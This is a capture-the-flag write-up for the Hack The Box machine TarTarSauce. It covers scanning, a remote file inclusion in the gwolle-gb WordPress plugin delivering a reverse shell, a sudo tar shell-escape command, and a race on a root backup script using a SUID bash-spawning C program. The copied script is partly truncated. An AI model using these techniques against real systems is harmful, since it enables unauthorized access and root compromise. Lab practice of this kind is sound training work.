Hack The Box - TarTarSauce


Getting Initial is by finding a vulnerable wordpress plugin and Privilege Escalation is exploiting a Custom script. Its really a fun box.

Link: https://www.hackthebox.eu/home/machines/profile/138

Let’s Begin with our Initial Nmap Scan.

Nmap Scan Results

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Linux 3.12 (93%), Linux 3.13 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
1   248.39 ms
2   248.52 ms

HTTP Enumeration

Only HTTP port is open so I checked that and it contains a Welcome message. Let’s Dig in.


Enumerating Monstra (Rabbit Hole)

From Nmap Scan it reveals there is robots.txt


First I checked /monstra-3.0.4, other than this all seems 404.


We know the version of it, so I just looked for any exploits available and came to know that we can get user credentials without authenticating.


Here we can see a users password and hash, but they are encrypted.


But when I loaded back to home page. I became admin. That seems odd.


While looking for exploits, I also found this one. Where we can upload a file and get Remote Code Execution.


According to the exploit, We can bypass the extension filter by uploading our payload in capital letters. So I tried that and it didn’t worked.


After spending some time, I decided to bruteforce the directories.

I found a different directory now.

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
2020/07/13 12:25:12 Starting gobuster
/wp (Status: 301)
2020/07/13 12:31:33 Finished

Getting User Shell

So its confirmed that’s a wordpress site.


First I did Vulnerable Plugin but it didn’t revealed anything. So I just did a full plugin scan.

root@kali:~/CTF/HTB/Boxes/Tartarsauce# wpscan --url -e ap --plugins-detection aggressive 
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

[+] URL: []
[+] Started: Mon Jul 13 18:32:31 2020
[+] gwolle-gb
 | Location:
 | Last Updated: 2020-06-21T14:59:00.000Z
 | Readme:
 | [!] The version is out of date, the latest version is 4.0.4
 | Found By: Known Locations (Aggressive Detection)
 |  -, status: 200
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  -
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  -

Now it reveals a new plugin for me.

Immediately searched in searchsploit and there is RFI exploit available.


According to the exploit, it looks for file name wp-load.php, So I changed my php reverse shell name as wp-load

And in my python server, I got the hit.


And Reverse shell in my nc listener.


The first thing I do always is, Checking sudo -l and it seems I can run tar as user onuma without any password.

$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar



tar have some special parameters than can help us to spawn a shell as user onuma

$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
$ whoami

Privilege Escalation

First I uploaded Enum script and it doesn’t reveals anything, So I tried uploading pspy and after sometime I get a hit with this running as user root.

2020/07/13 05:00:41 CMD: UID=0    PID=26257  | /bin/bash /usr/sbin/backuperer

So I checked the script and its a bash script doing some backup stuffs.


# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P

# Set Vars Here
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)

# formatting
    for n in $(seq 72);
    do /usr/bin/printf $"-";

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
    /usr/bin/diff -r $basedir $check$basedir

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
# Set Vars Here
tmpfile=/var/tmp/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
  • First it recursively deletes everything in /var/tmp/.* and /var/tmp/check.
  • Then it gzip everything in the directory /var/www/html and saves it in the file /var/tmp/.afgaufiuafgwfaf
  • After it sleeps for 30 seconds.
  • Creates the directory /var/tmp/check.
  • Extract the gzip file inside the check folder.
  • Then it do a integrity check.
  • If the files in /var/www/html are different from the files in the backup it created /var/tmp/check/var/www/html, then report error. Otherwise, move file /var/tmp/.efgefffsafffav to /var/backups/onuma-wwww-dev.bak and remove everything in the check directory. If the files are different it left that there and after 5mins when the application reruns remove those directory and start the process again.

So What we need to do is, We need to change the .ffegsigiisifghis file with our payload within the 30 seconds and after 30seconds it will extract it and Integrity checks happen, so it will different and it left those file there for the next 5mins.

Since the machine is 32bit, I made a C program and compiled it with 32bit. And make it SUID.

#include <unistd.h>
int main()
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;

Created var/www/html folder and put my file inside.


Opened Pspy in one terminal and waiting for the first hit. And here it takes the backup and stored it in /var/tmp

2020/07/13 23:46:43 CMD: UID=1000 PID=2738   | /bin/tar -zcvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d /var/www/html 
2020/07/13 23:46:43 CMD: UID=1000 PID=2737   | /bin/tar -zcvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d /var/www/html

I just Copy my payload (pwn) and replace it with the one it created.


Here we can see after the 30seconds it just extracted the file.

2020/07/13 23:47:13 CMD: UID=0    PID=2749   | /bin/tar -zxvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d -C /var/tmp/check 
2020/07/13 23:47:13 CMD: UID=0    PID=2748   | /bin/tar -zxvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d -C /var/tmp/check

Now we can see that check directory is created.


And running that SUID binary make me root. We own the Box!